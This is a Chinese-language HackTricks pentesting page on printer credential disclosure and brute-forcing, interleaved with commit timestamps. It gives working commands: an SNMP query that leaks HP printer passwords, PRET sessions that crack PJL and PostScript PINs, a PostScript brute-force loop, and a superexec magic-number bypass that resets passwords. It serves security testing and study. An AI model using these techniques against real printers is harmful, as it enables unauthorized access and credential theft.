2023-08-03 19:12:22 +00:00
|
|
|
|
# 凭证泄露 / 暴力破解
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
2023-04-25 18:35:28 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
- 你在一家**网络安全公司**工作吗?想要在HackTricks中**宣传你的公司**吗?或者你想要**获取PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
- 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品——[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
- 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
- **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram群组**](https://t.me/peass),或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
- **通过向[hacktricks仓库](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud仓库](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧**。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
</details>
|
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
打印机通常使用**默认密码或根本没有初始密码**进行部署。在这两种情况下,最终用户或管理员必须主动设置密码以保护设备。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
## 密码泄露
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2022-05-01 13:25:53 +00:00
|
|
|
|
### SNMP
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
古老的HP打印机存在一个返回密码的易受攻击的OID。其他供应商可能也存在类似基于SNMP的问题。
|
2021-10-18 11:21:18 +00:00
|
|
|
|
```
|
2020-07-15 15:43:14 +00:00
|
|
|
|
snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0
|
|
|
|
|
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 …
|
|
|
|
|
```
|
2022-05-01 13:25:53 +00:00
|
|
|
|
### Pass-Back
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
如果打印机使用外部LDAP对人员进行授权。如果您可以访问更改此设置(可能使用Web控制台界面),您可以使打印机连接到您的LDAP服务器并授权任何用户。请注意,您还可以滥用此设置来窃取打印机用于连接到LDAP服务器的凭据。[在此处阅读更多信息](../../windows-hardening/active-directory-methodology/ad-information-in-printers.md)。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2022-05-01 13:25:53 +00:00
|
|
|
|
## Brute-Force
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2022-05-01 13:25:53 +00:00
|
|
|
|
### PJL
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
由于其仅有16位密钥大小,PJL密码容易受到暴力破解攻击的影响。在不到30分钟的时间内,您可以猜测出正确的密码。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
您可以使用[PRET](https://github.com/RUB-NDS/PRET)的`lock`和`unlock`命令来测试暴力破解:
|
2021-10-18 11:21:18 +00:00
|
|
|
|
```
|
2020-07-15 15:43:14 +00:00
|
|
|
|
./pret.py -q printer pjl
|
|
|
|
|
Connection to printer established
|
|
|
|
|
|
|
|
|
|
Welcome to the pret shell. Type help or ? to list commands.
|
|
|
|
|
printer:/> lock 999
|
|
|
|
|
PIN protection: ENABLED
|
|
|
|
|
Panel lock: ON
|
|
|
|
|
Disk lock: ON
|
|
|
|
|
printer:/> unlock
|
|
|
|
|
No PIN given, cracking.
|
|
|
|
|
PIN protection: DISABLED
|
|
|
|
|
Panel lock: OFF
|
|
|
|
|
Disk lock: OFF
|
|
|
|
|
```
|
2022-05-01 13:25:53 +00:00
|
|
|
|
### PostScript
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
PostScript提供两种类型的密码:`SystemParamsPassword`用于更改打印作业设置,如纸张大小,而`StartJobPassword`则需要退出服务器循环,从而永久更改PostScript环境。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
针对PostScript密码的暴力攻击可以非常快速地执行,因为**PostScript解释器可以被编程为直接破解自身**:
|
2021-10-18 11:21:18 +00:00
|
|
|
|
```
|
2020-07-15 15:43:14 +00:00
|
|
|
|
/min 0 def /max 1000000 def
|
|
|
|
|
statusdict begin {
|
2023-08-03 19:12:22 +00:00
|
|
|
|
min 1 max
|
|
|
|
|
{dup checkpassword {== flush stop} {pop} ifelse} for
|
2020-07-15 15:43:14 +00:00
|
|
|
|
} stopped pop
|
|
|
|
|
```
|
2023-08-03 19:12:22 +00:00
|
|
|
|
另一种方法是通过使用Adobe的专有`superexec`运算符来**绕过PostScript密码**并将其重置。该运算符位于internaldict字典中,该字典由一个静态的、魔术密码(`1183615869`)进行“保护”。将PostScript代码包装到superexec中允许攻击者忽略语言的各种保护机制,这通常会引发invalidaccess错误。可以使用以下示例设置PostScript密码,而无需首先提交当前密码:
|
2021-10-18 11:21:18 +00:00
|
|
|
|
```
|
2020-07-15 15:43:14 +00:00
|
|
|
|
{ << /SystemParamsPassword (0)
|
2023-08-03 19:12:22 +00:00
|
|
|
|
/StartJobPassword (0) >> setsystemparams
|
2020-07-15 15:43:14 +00:00
|
|
|
|
} 1183615869 internaldict /superexec get exec
|
|
|
|
|
```
|
2023-08-03 19:12:22 +00:00
|
|
|
|
[PRET](https://github.com/RUB-NDS/PRET)的锁定和解锁命令可用于对数字(整数)PostScript密码进行**暴力破解**攻击的测试,或者通过**superexec magic**绕过这些密码:
|
2021-10-18 11:21:18 +00:00
|
|
|
|
```
|
2020-07-15 15:43:14 +00:00
|
|
|
|
./pret.py -q printer ps
|
|
|
|
|
Connection to printer established
|
|
|
|
|
|
|
|
|
|
Welcome to the pret shell. Type help or ? to list commands.
|
|
|
|
|
printer:/> lock 999
|
|
|
|
|
printer:/> unlock
|
|
|
|
|
No password given, cracking.
|
|
|
|
|
Device unlocked with password: 999
|
|
|
|
|
printer:/> lock S0me_Re4lly_g00d_Passw0rd!
|
|
|
|
|
printer:/> unlock bypass
|
|
|
|
|
Resetting password to zero with super-secret PostScript magic
|
|
|
|
|
Device unlocked with password: 0
|
|
|
|
|
```
|
2023-08-03 19:12:22 +00:00
|
|
|
|
**有关密码泄露和暴力破解的更多信息,请访问** [**http://hacking-printers.net/wiki/index.php/Credential\_disclosure**](http://hacking-printers.net/wiki/index.php/Credential\_disclosure)
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
2023-04-25 18:35:28 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
- 你在一家**网络安全公司**工作吗?想要在HackTricks中**宣传你的公司**吗?或者你想要**获取最新版本的PEASS或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
- 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品——[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
- 获得[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
- **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) **或**[**电报群组**](https://t.me/peass) **或在Twitter上关注我**[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-08-03 19:12:22 +00:00
|
|
|
|
- **通过向[hacktricks repo](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧。**
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
</details>
|